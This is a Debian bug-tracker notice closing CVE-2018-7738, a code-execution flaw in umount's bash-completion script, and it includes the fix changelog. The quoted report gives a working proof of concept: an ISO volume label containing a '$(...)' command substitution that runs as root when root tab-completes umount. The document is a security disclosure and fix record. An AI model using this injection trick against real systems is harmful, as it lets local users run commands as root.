Your message dated Wed, 07 Mar 2018 16:36:44 +0000 with message-id <e1etc3y-0005zg...@fasolo.debian.org> and subject line Bug#892179: fixed in util-linux 2.31.1-0.5 has caused the Debian Bug report #892179, regarding util-linux: CVE-2018-7738: code execution in bash-completion for umount to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 892179: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=892179 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
--- Begin Message ---Package: bash-completion Version: 1:2.1-4.3 Severity: grave Tags: security Hi, when bash-completion is installed, it uses /usr/share/bash-completion/completions/umount from umount package to provide autocompletion. This script does not escape mount paths correctly, so it allows a local user with rights to mount filesystems to execute commands in the context of the umount user (probably root). Unprivileged users can mount filesystems with custom mountpoints using udisks2, FUSE or with the help of desktop environments. Example: as regular user: ------------------------------ $ mkdir empty $ genisoimage -o test.iso -V '$(IFS=":";cmd="touch:foo";$cmd)' empty I: -input-charset not specified, using utf-8 (detected in locale settings) Total translation table size: 0 Total rockridge attributes bytes: 0 Total directory bytes: 0 Path table size(bytes): 10 Max brk space used 0 174 extents written (0 MB) $ udisksctl loop-setup -f test.iso Mapped file test.iso as /dev/loop0. (if not mounted by automounter already) $ udisksctl mount -b /dev/loop0 Mounted /dev/loop0 at /media/user/$(IFS=":";cmd="touch:foo";$cmd). ------------------------------ as different user or even root: ------------------------------ # ls -la total 28 drwxr-xr-x 2 root root 4096 Feb 14 10:00 . drwxrwxrwt 29 root root 24576 Feb 14 10:00 .. # umount <TAB> ^C # ls -la total 28 drwxr-xr-x 2 root root 4096 Feb 14 10:01 . drwxrwxrwt 29 root root 24576 Feb 14 10:00 .. -rw-r--r-- 1 root root 0 Feb 14 10:01 foo ------------------------------ I tested it using latest Debian GNU/Linux 9.3 (stretch) using default installation with desktop environment. Involved packages: mount 2.29.2-1 bash 4.4-5 bash-completion 1:2.1-4.3 genisoimage 9:1.1.11-3+b2 udisks2 2.1.8-1 uname -a Linux id382 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux It seems to be fixed in upstream util-linux already because of a similar bugfix: https://github.com/karelzak/util-linux/commit/75f03badd7ed9f1dd951863d75e756883d3acc55#diff-a47601b5dbce9dc06c3af1deb02758c7 Björn Bosselmann G DATA Software AG -- System Information: Debian Release: 9.3 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: amd64 (x86_64) Foreign Architectures: i386 Kernel: Linux 4.9.0-6-amd64 (SMP w/8 CPU cores) Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE= (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) Versions of packages bash-completion depends on: ii bash 4.4-5 ii dpkg 1.18.24 bash-completion recommends no packages. bash-completion suggests no packages. -- no debconf information
signature.asc
Description: OpenPGP digital signature
--- End Message ---
--- Begin Message ---Source: util-linux Source-Version: 2.31.1-0.5 We believe that the bug you reported is fixed in the latest version of util-linux, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 892...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Salvatore Bonaccorso <car...@debian.org> (supplier of updated util-linux package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Format: 1.8 Date: Tue, 06 Mar 2018 22:31:39 +0100 Source: util-linux Binary: util-linux util-linux-locales mount bsdutils fdisk fdisk-udeb libblkid1 libblkid1-udeb libblkid-dev libfdisk1 libfdisk1-udeb libfdisk-dev libmount1 libmount1-udeb libmount-dev libsmartcols1 libsmartcols1-udeb libsmartcols-dev libuuid1 uuid-runtime libuuid1-udeb uuid-dev util-linux-udeb setpriv rfkill Architecture: source Version: 2.31.1-0.5 Distribution: unstable Urgency: medium Maintainer: LaMont Jones <lam...@debian.org> Changed-By: Salvatore Bonaccorso <car...@debian.org> Closes: 745771 892179 Description: bsdutils - basic utilities from 4.4BSD-Lite fdisk - collection of partitioning utilities fdisk-udeb - Manually partition a hard drive (fdisk) (udeb) libblkid-dev - block device ID library - headers and static libraries libblkid1 - block device ID library libblkid1-udeb - stripped down block device ID library, for debian-installer (udeb) libfdisk-dev - fdisk partitioning library - headers and static libraries libfdisk1 - fdisk partitioning library libfdisk1-udeb - stripped down fdisk partitioning library, for debian-installer (udeb) libmount-dev - device mounting library - headers and static libraries libmount1 - device mounting library libmount1-udeb - stripped down device mounting library, for debian-installer (udeb) libsmartcols-dev - smart column output alignment library - headers and static librar libsmartcols1 - smart column output alignment library libsmartcols1-udeb - stripped down smart column output aligment library, for debian-in (udeb) libuuid1 - Universally Unique ID library libuuid1-udeb - stripped down Universally Unique ID library, for debian-installer (udeb) mount - tools for mounting and manipulating filesystems rfkill - tool for enabling and disabling wireless devices setpriv - tool to run a program with different Linux privilege settings util-linux - miscellaneous system utilities util-linux-locales - locales files for util-linux util-linux-udeb - stripped down miscellaneous system utilities, for debian-installe (udeb) uuid-dev - Universally Unique ID library - headers and static libraries uuid-runtime - runtime components for the Universally Unique ID library Changes: util-linux (2.31.1-0.5) unstable; urgency=medium . * Non-maintainer upload. . [ Laurent Bigonville ] * debian/rules: Enable SMACK support for libmount * Enable audit support (Closes: #745771) . [ Salvatore Bonaccorso ] * bash-completion: (umount) use findmnt, escape a space in paths. (CVE-2018-7738) Fixes "code execution in bash-completion for umount". (Closes: #892179) Checksums-Sha1: 725360ea1dd6cafab53cd6cb47b820b6fe246db9 4181 util-linux_2.31.1-0.5.dsc af698313de08817f24fbf6b899105946a429da76 87512 util-linux_2.31.1-0.5.debian.tar.xz Checksums-Sha256: d67c1bc851f0dd5028387671940b5904fabad2cb24e98eeb4a755fce7e82d317 4181 util-linux_2.31.1-0.5.dsc a0b049065431f8c9455fbe7276b8ca7cdf020cff0329cd1f050ee1fb380432ee 87512 util-linux_2.31.1-0.5.debian.tar.xz Files: 4f132982232dd39c252f03175e19a6c3 4181 base required util-linux_2.31.1-0.5.dsc 9a16b5741bd41c3938586e1c123fab04 87512 base required util-linux_2.31.1-0.5.debian.tar.xz -----BEGIN PGP SIGNATURE----- iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlqfiN5fFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk ZWJpYW4ub3JnAAoJEAVMuPMTQ89EQaEP/2hMnxx0hkQ9rhGQXmAt0LXsdnLLka0o 93JKtW0TmCKDh9Bfm+SP1W/BWu7jYDDpm/O1cAv7+H/4hCraG3q0ZXyjoUP6u7gR 7bXUnEeDEVectjfQMyIhcaY50UoMog8dyH8O1EOt9gPRmbbxYrkXQK6iJPZslCt+ gV06FZQ5yuCWL2oCfL7udisRO7VdbUrv61VkY0t9pYsSTfjZAT1FA3YCCbQ7m4me jOpEDPHFt7SbXGTPVfbr6izvm+XmPBtZtWo1NjsOwNRfqCxN4PBjP2YFmIcmXyJE OR+jUvZz8VWvonbomTr/jNcgbKh3oLKojsLMzJOkFuO+u4YiR1qGzV7TBOkl77EM +0xGKKOcms5kZDU/YHXK7ObZslCfvVWlKHcbASCsj+IihNyrqDiExL89uQ/X99jj oi9nhGe5Jdfdw1l7x7kgISzpWhBEZ4eYxAMPsPrEzAInZF12abaJ2trRs285QlS6 zrot5wD5UKjBmggijj5IWSgJgDFiP6pJL4MnCleNxwOCWbBbgvwr+Cho86aH45AQ ufNhlBpqp0xgfU46YVOcVk5Z3UTbY0Vtli9z+aeOnWGWBDJeYTdvcyO6pj5XQwD3 DlCRH24UZsLmpDavBcNKjXf4um6xbl0nxDgAMfXwhor9cpi1YqVzAEInGcnpK30o dOlWnSG1eTBB =qoQ3 -----END PGP SIGNATURE-----
--- End Message ---
